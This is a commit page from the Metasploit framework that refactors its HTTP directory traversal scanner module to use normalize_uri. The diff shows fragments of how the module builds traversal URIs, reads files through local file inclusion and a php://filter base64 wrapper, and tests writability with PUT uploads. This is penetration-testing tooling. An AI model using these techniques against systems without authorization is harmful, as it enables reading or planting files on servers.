Skip to content

Commit 9f78bec

Browse files
author
Tod Beardsley
committed
Use normalize_uri (@wchen-r7)
Instead of editing the datastore['PATH'], use normalize_uri. Since the purpose of this module is quite fuzz-like, I didn't want to apply the normalize_uri to the whole uri -- the original code merely applied to datastore['PATH'] (which seems like it should be datastore['URI'] really) and then added on a bunch of other stuff to test for traversals.
1 parent f7bfab5 commit 9f78bec

File tree

1 file changed

+7
-12
lines changed

1 file changed

+7
-12
lines changed

modules/auxiliary/scanner/http/http_traversal.rb

Lines changed: 7 additions & 12 deletions
Original file line numberDiff line numberDiff line change
@@ -106,7 +106,7 @@ def fuzz
106106
1.upto(depth) do |d|
107107
file_to_read.each do |f|
108108
trigger = base * d
109-
p = datastore['PATH'] + trigger + f
109+
p = normalize_uri(datastore['PATH']) + trigger + f
110110
req = ini_request(p)
111111
vprint_status("Trying: http://#{rhost}:#{rport}#{p}")
112112
res = send_request_cgi(req, 25)
@@ -187,15 +187,15 @@ def check(trigger)
187187
if datastore['TRIGGER'].empty?
188188
# Found trigger using fuzz()
189189
found = true if trigger
190-
uri = datastore['PATH'] + trigger
190+
uri = normalize_uri(datastore['PATH']) + trigger
191191
else
192192
# Manual check. meh.
193193
if datastore['FILE'].empty?
194194
print_error("Must specify a 'FILE' to check manually")
195195
return
196196
end
197197

198-
uri = datastore['PATH'] + trigger + datastore['FILE']
198+
uri = normalize_uri(datastore['PATH']) + trigger + datastore['FILE']
199199
req = ini_request(uri)
200200
vprint_status("Trying: http://#{rhost}:#{rport}#{uri}")
201201
res = send_request_cgi(req, 25)
@@ -211,7 +211,7 @@ def check(trigger)
211211
:port => rport,
212212
:vhost => datastore['VHOST'],
213213
:path => uri,
214-
:params => datastore['PATH'],
214+
:params => normalize_uri(datastore['PATH']),
215215
:pname => trigger,
216216
:risk => 3,
217217
:proof => trigger,
@@ -234,7 +234,7 @@ def lfi_download(trigger, files)
234234
# Our trigger already puts us in '/', so our filename doesn't need to begin with that
235235
f = f[1,f.length] if f =~ /^\//
236236

237-
req = ini_request(uri = (datastore['PATH'] + trigger + f).chop)
237+
req = ini_request(uri = (normalize_uri(datastore['PATH']) + trigger + f).chop)
238238
res = send_request_cgi(req, 25)
239239

240240
vprint_status("#{res.code.to_s} for http://#{rhost}:#{rport}#{uri}") if res
@@ -261,7 +261,7 @@ def php_download(files)
261261
# Our trigger already puts us in '/', so our filename doesn't need to begin with that
262262
f = f[1,f.length] if f =~ /^\//
263263

264-
req = ini_request(uri = (datastore['PATH'] + "php://filter/read=convert.base64-encode/resource=" + f).chop)
264+
req = ini_request(uri = (normalize_uri(datastore['PATH']) + "php://filter/read=convert.base64-encode/resource=" + f).chop)
265265
res = send_request_cgi(req, 25)
266266

267267
vprint_status("#{res.code.to_s} for http://#{rhost}:#{rport}#{uri}") if res
@@ -294,7 +294,7 @@ def is_writable(trigger)
294294

295295
# Form the PUT request
296296
fname = Rex::Text.rand_text_alpha(rand(5) + 5) + '.txt'
297-
uri = datastore['PATH'] + trigger + fname
297+
uri = normalize_uri(datastore['PATH']) + trigger + fname
298298
vprint_status("Attempt to upload to: http://#{rhost}:#{rport}#{uri}")
299299
req = ini_request(uri)
300300

@@ -331,11 +331,6 @@ def load_filelist
331331
end
332332

333333
def run_host(ip)
334-
# Make sure datastore['PATH] begins with a '/'
335-
if datastore['PATH'] !~ /^\//
336-
datastore['PATH'] = '/' + datastore['PATH']
337-
end
338-
339334
print_status("Running action: #{action.name}...")
340335

341336
# And it's..... "SHOW TIME!!"

0 commit comments

Comments
 (0)